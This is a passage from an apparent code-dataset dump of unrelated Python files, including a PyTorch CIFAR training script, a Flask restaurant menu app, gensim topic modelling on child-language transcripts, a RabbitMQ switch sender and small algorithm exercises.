= output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, target_prob)) / batch \n return loss\n def kd_loss(self, output, target):\n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n ps = torch.nn.functional.log_softmax(output / args.T, dim=1)\n log_like = torch.nn.functional.kl_div(ps, target_prob, size_average=False)\n log_like = log_like * (args.T ** 2) / batch\n return log_like\n def sce_loss(self, output, onehot):\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, onehot)) / output.shape[0]\n return loss\n \n def train(self, train_loader, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n \n global numberofclass \n\n # switch to train mode\n self.model.train()\n end = time.time()\n current_LR = get_learning_rate(self.optimizer)[0]\n \n self.cur_epoch_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_cnt = torch.zeros(numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_lams.requires_grad = False\n self.cur_epoch_cnt.requires_grad = False\n for i, (input, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input = input.cuda()\n target = target.cuda()\n input_var = torch.autograd.Variable(input, requires_grad=True)\n \n \n # compute output\n output = self.model(input_var)\n \n if args.method == 'ols':\n self.update_loss_lams(output, target)\n args.T = 1.\n loss = 0.5 * self.criterion(output, target) + \\\n 0.5 * self.soft_cross_entropy(output, target)\n elif args.method == 'ls':\n loss = self.criterion(output, target)\n elif args.method == 'PC':\n if epoch < 200:\n loss = torch.nn.functional.cross_entropy(output, \\\n target)\n else:\n loss = self.criterion(output, target)\n else:\n loss = self.criterion(output, target)\n \n #measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # compute gradient and do SGD step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n \n \n \n if i % args.print_freq == 0 and args.verbose == True:\n print('Epoch: [{0}/{1}][{2}/{3}]\\t'\n 'LR: {LR:.6f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, len(train_loader), LR=current_LR, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n \n if args.method == 'ols': \n for cls in range(numberofclass):\n if self.cur_epoch_cnt[cls].max() < 0.5:\n self.loss_lams[cls] = 1. 
/ numberofclass \n else:\n self.loss_lams[cls] = self.cur_epoch_lams[cls] / self.cur_epoch_cnt[cls] \n return losses.avg\n\n def validate(self, val_loader, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output = self.model(input_var)\n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n def save_scripts(self, val_loader, epoch, prop):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n save_name = args.net_type + '_' + args.method + '_' + prop \n embedding = []\n labels = []\n\n for i, (input, target) in enumerate(val_loader):\n if i > 80:\n break\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output, ebd = self.model(input_var)\n for j in range(ebd.shape[0]):\n embedding.append(ebd[j].detach().cpu().numpy())\n labels.append(target[j].detach().cpu().numpy())\n \n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n embedding = np.array(embedding)\n labels = np.array(labels)\n print('------',embedding.shape)\n for kk in range(10):\n print(embedding[kk].shape)\n np.save('./embeddings/' + save_name + '_' + 'emd.npy', embedding)\n np.save('./embeddings/' + save_name + '_' + 'labels.npy', labels)\n \n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n \n \n def visualize(self, dataloader, classes_id 
= [5, 2, 1], samples_per_class = 100):\n data = torch.zeros(samples_per_class * len(classes_id), 256, dtype=torch.float32)\n target = torch.zeros(samples_per_class * len(classes_id), dtype=torch.float32)\n cnt = torch.ones(len(classes_id), dtype=torch.long) * samples_per_class\n cur_cnt = 0\n with torch.no_grad():\n for i, (input, y) in enumerate(dataloader):\n output, attens = self.model(input)\n if cnt.sum() == 0:\n break\n for kk in range(input.shape[0]):\n if int(y[kk]) in classes_id and cnt[classes_id.index(y[kk])] > 0:\n data[cur_cnt] = attens[kk]\n target[cur_cnt] = y[kk]\n \n cnt[classes_id.index(y[kk])] = cnt[classes_id.index(y[kk])] - 1\n cur_cnt += 1\n \n return data, target\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n directory = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n if not os.path.exists(directory):\n os.makedirs(directory)\n filename = directory + filename\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, '%s/runs/record_dir/%s/' % (args.save_dir, args.expname) + 'model_best.pth.tar')\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n if args.dataset.startswith('cifar') or args.dataset == ('tiny-imagenet'):\n lr = args.lr * (0.1 ** (epoch // (args.epochs * 0.5))) * (0.1 ** (epoch // (args.epochs * 0.75)))\n elif args.dataset == ('imagenet'):\n if args.epochs == 300:\n lr = args.lr * (0.1 ** (epoch // 75))\n elif args.epochs > 30:\n lr = args.lr * (0.1 ** (epoch // 30))\n #else:\n # if epoch < 10:\n # lr = args.lr\n # elif epoch < 40:\n # lr = args.lr * 0.1\n # else:\n # lr = args.lr * 0.01\n #lr = args.lr * (0.1 ** (epoch // 10))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef get_learning_rate(optimizer):\n lr = []\n for param_group in optimizer.param_groups:\n lr += [param_group['lr']]\n return lr\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n wrong_k = batch_size - correct_k\n res.append(wrong_k.mul_(100.0 / batch_size))\n\n return res\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cifar/scripts/train_cifar_all_methods.py","file_name":"train_cifar_all_methods.py","file_ext":"py","file_size_in_byte":28485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"156303977","text":"# -*- coding: utf-8 -*-\n# author: Guoanboyu\n# email: guoappserver@gmail.com\n\n#main.pyw\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nfrom cloud_picture.untitled import Ui_MainWindow\n\nclass MyForm(QtGui.QMainWindow):\n def __init__(self, parent = None):\n QtGui.QMainWindow.__init__(self,parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n form = MyForm()\n form.show()\n sys.exit(app.exec_())","sub_path":"cloud_picture/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312161056","text":"import nltk\nimport time\nimport csv\nfrom gensim import corpora\nfrom gensim.models.ldamodel import LdaModel\nfrom os import listdir\nfrom nltk.corpus.reader import CHILDESCorpusReader\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords, wordnet\n\nstart = time.time()\ncorpus_root = nltk.data.find('corpora/childes/data-xml/Eng-USA-MOR/')\nfolders = listdir('C:/nltk_data/corpora/childes/data-xml/Eng-USA-MOR')\n\n#stemmer = SnowballStemmer(\"english\")\n\nsw = stopwords.words('english')\nsw.extend(['xxx', 'yyy', 'www', 'huh', 'yeah','ever', 'even', 'anyway', 'everybody', \n'yes', 'mhm', 'yep', 'uhhuh', 'alright', 'never', 'sometimes', 'either', 'everyone'\n'gonna', 'goin', 'another', 'okay', 'hey', 'anything', 'ready', 'uhuh', 'ouch', 'only', \n'away', 'sure', 'well', 'right', 'okay', 'would', 'around', 'across', 'everything', \n'maybe', 'big', 'little', 'nice', 'wow', 'new', 'cool', 'else', 'ago', 'almost', 'another', \n'ahead', 'always', 'already', 'whoops', 'em', 'wan', 'much', 'nope', 'hum', 'anyways', \n'yet', 'though', 'somethin', 'cha', 'anything', 'somebody', 'may', 'still', 'uhoh', \n'also', 'instead', 'whose', 'without', 'behind', 'anybody', 'any', 'away', 'why', \n'please', 'yay', 'oops', 'any', 'please', 'another', 'something', 'very'])\n#sw = [stemmer.stem(item) for item in sw]\n\nwith open ('animal.csv', 'rb')as f:\n reader = csv.reader(f)\n animal = []\n for row in reader:\n animal.extend(row)\n\nchildes = CHILDESCorpusReader(corpus_root, '.*.xml', lazy=False)\nfiles = childes.fileids()\nresultlist = []\n\nfor filename in files:\n sents = childes.sents(filename)[0]\n for sent in sents:\n result_lower = [item.lower() for item in sent]\n #result_stem = [stemmer.stem(item) for item in result_lower]\n result_clean = [item for item in result_lower if '\\'' not in item \n and '_' not in item and len(item) > 1]\n result = [item for item in result_clean if item not in sw]\n resultlist.append(result)\nprint(resultlist[0])\n\n \ndictionary = corpora.Dictionary(resultlist)\ncorpus = [dictionary.doc2bow(text) for text in resultlist]\n\nlda = LdaModel(corpus = corpus, id2word = dictionary, num_topics = 500)\ntopiclist = lda.print_topics(num_topics = 500, num_words = 50)\nlda.save('childs_sent_500.model')","sub_path":"childes/childes-500-sent.py","file_name":"childes-500-sent.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15127943","text":"\"\"\" A PyFace widget for a command binding. \"\"\"\n\n\nimport wx\n\nfrom envisage.import_manager import ImportManager\nfrom pyface.api import Widget\nfrom traits.api import Instance\n\nfrom pgv.red.ui.command_library import CommandBinding\nfrom pgv.red.ui.keyboard import get_key_combination_name\n\n\nclass CommandBindingWidget(Widget):\n \"\"\" A PyFace widget for a command binding. \"\"\"\n\n #### 'object' protocol ####################################################\n\n def __init__(self, **traits):\n \"\"\" Create the widget. \"\"\"\n\n # Base class constructor.\n super(CommandBindingWidget, self).__init__(**traits)\n\n # Create the toolkit-specific control that represents the widget.\n self.control = self._create_control(self.parent)\n\n #### 'AddCommandBindingWidget' protocol ####################################\n\n # The command binding that we are editing.\n command_binding = Instance(CommandBinding)\n \n #### Protected 'Widget' protocol ##########################################\n\n def _create_control(self, parent):\n \"\"\" Create the widget's toolkit-specific control. \"\"\"\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n panel = wx.Panel(parent, -1)\n panel.SetSizer(sizer)\n panel.SetAutoLayout(True)\n\n key_combination_control = self._create_key_combination_control(\n panel, self.command_binding\n )\n sizer.Add(key_combination_control, 0, wx.RIGHT, 5)\n\n factory_name_control = self._create_command_factory_name_control(\n panel, self.command_binding\n )\n sizer.Add(factory_name_control, 1, wx.EXPAND)\n\n sizer.Fit(panel)\n return panel\n\n #### Private protocol ######################################################\n\n # Used to import command factories.\n _import_manager = Instance(ImportManager, ())\n\n def _create_command_factory_name_control(self, parent, command_binding):\n \"\"\" Create a control for the command factory name. \"\"\"\n\n command_factory_name = command_binding.command_factory_name\n \n text_ctrl = wx.TextCtrl(parent, -1, command_factory_name)\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n\n def text_changed(event):\n command_binding.command_factory_name = text_ctrl.GetValue()\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n event.Skip()\n \n text_ctrl.Bind(wx.EVT_TEXT, text_changed)\n\n return text_ctrl\n\n def _set_command_factory_tooltip(self, control, command_factory_name):\n \"\"\" Set the command factory tooltip on a control. \"\"\"\n\n tool_tip = wx.ToolTip(\n tip=self._get_command_factory_docstring(command_factory_name)\n )\n control.SetToolTip(tool_tip)\n \n def _get_command_factory_docstring(self, command_factory_name):\n \"\"\" Return the docstring for the command factory with the given name.\n\n \"\"\"\n\n try:\n command_factory = self._import_manager.import_symbol(\n command_factory_name\n )\n docstring = command_factory.__doc__\n \n except:\n docstring = 'command factory does not exist!'\n \n return docstring\n \n def _create_key_combination_control(self, parent, command_binding):\n \"\"\" Create a control for the key code/modifier combination. 
\"\"\"\n\n key_code, modifiers = command_binding.key_combination\n \n style = wx.TE_PROCESS_TAB | wx.TE_PROCESS_ENTER\n text_ctrl = wx.TextCtrl(\n parent, -1, get_key_combination_name(key_code, modifiers),\n style = style\n )\n\n def character_entered(event):\n key_code = event.GetKeyCode()\n modifiers = event.GetModifiers()\n\n key_combination_name = get_key_combination_name(key_code, modifiers)\n\n text_ctrl.SetValue(key_combination_name)\n command_binding.key_combination = (key_code, modifiers)\n \n text_ctrl.Bind(wx.EVT_CHAR, character_entered)\n\n return text_ctrl\n\n#### EOF #######################################################################\n","sub_path":"source/pgv/red/ui/command_binding_widget.py","file_name":"command_binding_widget.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"189016290","text":"#!/usr/bin/env python\nimport pika\nimport time\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq.dev.twleansw.com'))\nchannel = connection.channel()\nfor i in range(0, 2) :\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_ON')\n\tprint(\" [x] Sent POWER_ON\")\n\ttime.sleep(5) # delays for 5 seconds\n\t\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_OFF')\n\ttime.sleep(5) # delays for 5 seconds\n\tprint(\" [x] Sent POWER_OFF\")\n\n","sub_path":"pi3_python/test_mq_send_switch_command.py","file_name":"test_mq_send_switch_command.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"288655822","text":"'''\nSolution:\n1. Insert all new possible words to the Trie.\n2. For each old word (split in the sentence by a space), check whether any subword is present in the Trie as a word\n and if present replace the sub-word with the old word and otherwise leave the old-word as is.\n3. Return the sentence conaining replaced words.\n\nTime Complexity: O(n * L) n is no. of words and L is max length of one word\nSpace Complexity: O(n * L) max space occupied by the Trie; there is also space occupied by new sentence which is again\n O(n * L) and so total space complexity would be O(n * L)\n\n--- Passed all testcases on Leetcode successfully\n'''\n\n\nclass TrieNode(object):\n\n def __init__(self):\n self.children = [None for i in range(26)]\n self.word = None\n\n\nclass Trie(object):\n\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n\n # function to insert a word in a Trie data structure\n\n # initialize to the root of the trie as current node\n currNode = self.root\n\n # traverse the trie until we hit the length of word to be inserted\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None):\n currNode.children[ord(currChar) - ord('a')] = TrieNode()\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n currNode.word = word\n\n\nclass ReplaceWords(object):\n def replaceWords(self, dict, sentence):\n \"\"\"\n :type dict: List[str]\n :type sentence: str\n :rtype: str\n \"\"\"\n # initialize a Trie\n trie = Trie()\n\n # insert all words to a Trie present in the dict\n for word in dict:\n trie.insert(word)\n\n # intialize a list to append all new words replacing old words\n newWords = []\n\n # traverse all words\n for word in sentence.split():\n\n # traverse the entire old word until you hit a sub-word\n currNode = trie.root\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None or currNode.word != None): # condition to break\n break\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n newWord = currNode.word # take the new word to be the subword till we traversed\n\n if (newWord == None): # if new word not a word, then append old word itself\n newWords.append(word)\n else: # else append new word\n newWords.append(newWord)\n\n return ' '.join(newWords) # join the list of new words as a string\n","sub_path":"ReplaceWords.py","file_name":"ReplaceWords.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"629983861","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\napp = Flask(__name__)\n\n#create engine to reference db\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n\n@app.route('/')\ndef hello():\n\toutput = \"\"\n\toutput += \"hello!\"\n\treturn output\n\n@app.route('/restaurants')\ndef restaurants():\n\trestaurants = session.query(Restaurant).all()\n\treturn render_template(\"restaurant.html\", restaurants = restaurants)\n\n@app.route('/restaurants/new', methods=['GET','POST'])\ndef newRestaurant():\n\tif request.method == 'POST':\n\t\tnewRestaurant = Restaurant(name = request.form['name'])\n\t\tsession.add(newRestaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template(\"newrestaurant.html\")\n\n\n@app.route('/restaurants//edit', methods=['GET','POST'])\ndef editRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method =='POST':\n\t\trestaurant.name = request.form[\"newName\"]\n\t\tsession.add(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('editrestaurant.html',restaurant = restaurant)\n\n\n@app.route('/restaurants//delete', methods=['GET','POST'])\ndef deleteRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method == 'POST':\n\t\tsession.delete(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('deleterestaurant.html',restaurant=restaurant)\n\n\n\n@app.route('/restaurants//menu')\ndef restaurantMenu(restaurant_id):\n\titems = session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all()\n\treturn render_template('menu.html',items = items)\n\treturn \"the menu items for restaurant with id\"\n\n@app.route('/restaurants//menu/new')\ndef newMenuItem(restaurant_id):\n\treturn \"creating a new menu item\"\n\n@app.route('/restaurants//menu//edit')\ndef editMenuItem():\n\treturn \"editing menu item with id\"\n\n@app.route('/restaurants//menu//delete')\ndef deleteMenuItem():\n\treturn \"confirmation for deleting menu item with id\"\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/Lesson5/restaurantserver.py","file_name":"restaurantserver.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"31934968","text":"from collections import deque\nT=int(input())\n\ndef bfs(x,y):\n global cnt\n queue=deque()\n queue.append((x,y))\n cnt=0\n \n # visited[x][y]=True\n while queue:\n x,y=queue.popleft()\n cnt+=1\n for i in range(4):\n nx=x+dx[i]\n ny=y+dy[i]\n if nx>=N or ny>=M or nx<0 or ny<0:\n continue\n if graph[nx][ny]==0:\n continue\n if graph[nx][ny]==1:\n graph[nx][ny]=0\n queue.append((nx,ny))\n return cnt\n \nfor t in range(T):\n count=0\n dx=[-1,1,0,0]\n dy=[0,0,-1,1]\n M,N,K=map(int,input().split()) #가로, 세로, 배추 위치 개수\n graph=[[0]*(M+1) for _ in range(N+1)]\n \n for k in range(K):\n x,y=map(int,input().split())\n graph[y][x]=1 #x가로 y세로\n \n for i in range(N+1): #i 세로 j 가로\n for j in range(M+1):\n if graph[i][j]==1:\n # print(bfs(i,j))\n bfs(i,j)\n count+=1\n \n print(count)","sub_path":"baekjoon/단계별 문제/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412345666","text":"import glob\nimport numpy as np\n\nfiles = glob.glob('./codedata/*/*', recursive=True)\n\n# Split files into test/train set\nnp.random.seed(1000) # For reproducability\nnp.random.shuffle(files)\nN = int(float(len(files))*0.8) # Do an 80-20 split for training/validation\n\ndata = dict(\n train=files[:N],\n valid=files[N-len(files):],\n)\n\nnum_nq_examples = dict(train=N, valid=len(files)-N)\n\nprint(num_nq_examples)\n","sub_path":"globit.py","file_name":"globit.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"505681564","text":"from tkinter import *\r\nroot = Tk()\r\n\r\nroot.geometry('300x200')\r\nroot.title(\" ATTRIBUTES TUTORIAL \")\r\n# start attributes\r\n'''\r\nimportant label attributes\r\ntext-adds the text\r\nbg-backgroung \r\nfg-foreground\r\nfont-set the font\r\npadx-x padding\r\npady-y padding\r\nrelief-borderstyling-SUNKEN,RAISED,GROOVE,RIDGE\r\n\r\n\r\nimportant pack attributes\r\nanchor=nw,ew,es,sw,etc\r\nside=top,bottom,left,right\r\nfill x & Y\r\npadding- x & y \r\n'''\r\nsaqib = Label(text='''“Dream is not that which \r\nyou see while sleeping it is\r\n something that does not let you sleep.”\r\n― A P J Abdul Kalam''', bg='orange', fg='blue', padx=15, pady=50, font=\"comicsansms 19 bold\", borderwidth=5, relief=SUNKEN)\r\n\r\nsaqib.pack(side=BOTTOM, anchor=\"sw\", fill=X, padx=20, pady=50)\r\nroot.mainloop()\r\n","sub_path":"attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"123515168","text":"import os\nimport sys\n\n\nfiles = [\n\t\"Server.cs\",\n\t\"Threading.cs\",\n\t\"Logger.cs\",\n\t\"ProtocolFormat.cs\",\n\t\"NetworkCommand.cs\",\n\t\"Constants.cs\",\n\t\"BinaryConverter.cs\",\n\t\"NetworkName.cs\"\n]\n\nbuild_exe = \"--exe\" in sys.argv\n\n# if \"--exe\" in sys.argv:\n# \tprint (\"Building standalone server\")\n# \tcall = \"csc -out:Server2.exe Program.cs -r:MorkoNetwork.dll\"\n# else:\n\nprint (\"Building MorkoNetwork library\")\ncall = \"csc -out:MorkoNetwork.dll -unsafe -debug -target:library {}\".format(\" \".join(files))\n\nos.system(call)\n","sub_path":"Network/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"287985369","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nimport tensorflow as tf\n\n\n# In[271]:\n\n\ndef model(num_units, dropout = 0.0):\n \n classifier = Sequential()\n classifier.add(Dense(4*num_units,activation='relu',kernel_initializer='uniform', input_dim = 4039))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(2*num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dense(1, activation='sigmoid', kernel_initializer='uniform'))\n return classifier\n\n\n# In[272]:\n\n\nclassifier = model(5, 0.3)\n\n\n# In[273]:\n\n\noptimizer = keras.optimizers.Adam(lr = 0.0001)\n\n\n# In[274]:\n\n\nclassifier.compile(optimizer=optimizer,loss='binary_crossentropy',metrics=['accuracy'])\n\n\n# In[275]:\n\n\nclassifier.fit(xTrain,yTrain,batch_size = 128, epochs = 200)\n\n\n# In[276]:\n\n\ny_p = classifier.predict(xTrain)\n\n\n# In[277]:\n\n\ny_p_1 = classifier.predict(xval)\n\n\n# In[278]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yTrain:\n #print(j)\n error1 = i - y_p[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[279]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yval:\n #print(j)\n error1 = i - y_p_1[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[280]:\n\n\ny_p_2 = classifier.predict(X_test)\n\n\n# In[281]:\n\n\nprint(y_p_2)\n\n\n# In[299]:\n\n\nprint(print(id_test))\n\nprint(len(y_p_2))\nid_test.count()\n\n\n# In[301]:\n\n\nid_test.head()\n\n\n# In[313]:\n\n\nids = id_test.iloc[:].values\nprint(ids)\n\n\n# In[323]:\n\n\nv_id = []\nj = 0\n\nfor i in ids:\n if not pd.isnull(i):\n v_id.append(j)\n j = j+1\n\n\n# In[324]:\n\n\nprint(v_id)\n\n\n# In[325]:\n\n\npout = y_p_2[v_id]\niout = ids[v_id]\n\n\n# In[326]:\n\n\npredictions = pd.DataFrame(pout, columns=['is_goal'])\nidss = pd.DataFrame(iout, columns=['shot_id_number'])\npredictions = pd.concat((idss, predictions), axis = 1)\npredictions.to_csv('result1.csv', sep=\",\", index = False)\n\n\n","sub_path":"Nn.py","file_name":"Nn.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"650781147","text":"#!/user/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: ChenHanping\n@Email:\n@QQ:\n\n@date: 2019/12/3\n@description:\n\"\"\"\nimport json\nimport copy\nfrom datetime import datetime,timedelta\nimport ctx\n# from src import ctx\nfrom service.handlers.base import BaseHandler\nfrom utils import api_util\n\ndef _db():\n return ctx.modledb['model_result_simulation']\n\ndef tt(date):\n #datetime转换为字符串T%H%M\n at = ((date.minute) // 15) * 15\n if at==0:\n at='00'\n t = date.strftime('T%H')+str(at)\n return t\n\ndef conversion(target1,date,t,staTime,endTime):\n DATA = {}\n res = []\n # 预测数据\n for target in target1:\n statusYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 5}\n frequencyYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 7}\n if target == 'PMP-1':\n for v in _db().find_one(frequencyYC, {'_id': 0, t: 1}).values():\n for i in v:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = 